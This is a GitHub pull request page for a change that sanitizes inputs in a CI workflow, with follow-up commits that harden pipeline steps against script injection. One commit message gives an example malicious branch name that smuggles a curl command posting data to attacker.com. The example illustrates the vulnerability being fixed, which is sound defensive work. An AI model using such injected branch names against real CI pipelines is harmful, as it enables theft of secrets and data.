Skip to content

[SINT-2273] update workflow steps #7579

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 1 commit into from
Sep 29, 2025
Merged

[SINT-2273] update workflow steps #7579

merged 1 commit into from
Sep 29, 2025

Conversation

@ikraemer-dd
Copy link
Contributor

@ikraemer-dd ikraemer-dd commented Sep 29, 2025
edited
Loading

Summary of changes

Update delete-pr-image workflow to only run on sanitized inputs.

Reason for change

Implementation details

Test coverage

Other details

@ikraemer-dd ikraemer-dd force-pushed the ikraemer/workflow-sanitization branch from 829f5e1 to 91f78e3 Compare September 29, 2025 15:29
@github-actions github-actions bot added the area:builds project files, build scripts, pipelines, versioning, releases, packages label Sep 29, 2025
@ikraemer-dd ikraemer-dd changed the title wip [SINT-2273] update workflow stpes Sep 29, 2025
@ikraemer-dd ikraemer-dd changed the title [SINT-2273] update workflow stpes [SINT-2273] update workflow steps Sep 29, 2025
@ikraemer-dd ikraemer-dd marked this pull request as ready for review September 29, 2025 15:32
@ikraemer-dd ikraemer-dd requested a review from a team as a code owner September 29, 2025 15:32
bouwkast
bouwkast requested changes Sep 29, 2025
View reviewed changes
@ikraemer-dd ikraemer-dd force-pushed the ikraemer/workflow-sanitization branch from 91f78e3 to 91a8a5e Compare September 29, 2025 15:59
bouwkast
bouwkast approved these changes Sep 29, 2025
View reviewed changes
Copy link
Collaborator

@bouwkast bouwkast left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks!

@ikraemer-dd ikraemer-dd enabled auto-merge (squash) September 29, 2025 16:05
@ikraemer-dd ikraemer-dd merged commit a4a4ce0 into master Sep 29, 2025
93 of 97 checks passed
@ikraemer-dd ikraemer-dd deleted the ikraemer/workflow-sanitization branch September 29, 2025 16:16
@github-actions github-actions bot added this to the vNext-v3 milestone Sep 29, 2025
@ikraemer-dd ikraemer-dd mentioned this pull request Sep 29, 2025
Merged
bouwkast pushed a commit that referenced this pull request Sep 30, 2025
@ikraemer-dd
[SINT-4157] sanitise ultimate-pipeline.yml (#7582)
c2c3b52 
## Summary of changes

Follow-up of #7579

## Reason for change

`upload_container_images.upload` job is executed for PR (with a specific
label). An attacker can create a PR with a carefully branch name that
can result in command injection. Such a branch name can be
`test\",\"malicious\":\"$(curl -X POST
https://attacker.com/steal-data)\"`

## Implementation details

## Test coverage

## Other details
<!-- Fixes #{issue} -->


<!--  ⚠️ Note:

Where possible, please obtain 2 approvals prior to merging. Unless
CODEOWNERS specifies otherwise, for external teams it is typically best
to have one review from a team member, and one review from apm-dotnet.
Trivial changes do not require 2 reviews.

MergeQueue is NOT enabled in this repository. If you have write access
to the repo, the PR has 1-2 approvals (see above), and all of the
required checks have passed, you can use the Squash and Merge button to
merge the PR. If you don't have write access, or you need help, reach
out in the #apm-dotnet channel in Slack.
-->
ikraemer-dd added a commit that referenced this pull request Oct 1, 2025
@ikraemer-dd
Revert "[SINT-2273] update workflow steps (#7579)"
91b3622 
This reverts commit a4a4ce0.
@ikraemer-dd ikraemer-dd mentioned this pull request Oct 1, 2025
Merged
ikraemer-dd added a commit that referenced this pull request Oct 2, 2025
@ikraemer-dd
[SINT-4157] improve workflow (#7599)
5c31d38 
## Summary of changes
Follow-up of #7579
The method used in this PR is documented here
https://docs.github.com/en/actions/reference/security/secure-use#understanding-the-risk-of-script-injections
and is a safer way to mitigate possible injections.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@bouwkast bouwkast bouwkast approved these changes

@juliendoutre juliendoutre juliendoutre approved these changes

Assignees

No one assigned

Labels

area:builds project files, build scripts, pipelines, versioning, releases, packages area:docs

Projects

None yet

Milestone

3.28.0

Development

Successfully merging this pull request may close these issues.

4 participants

@ikraemer-dd @bouwkast @juliendoutre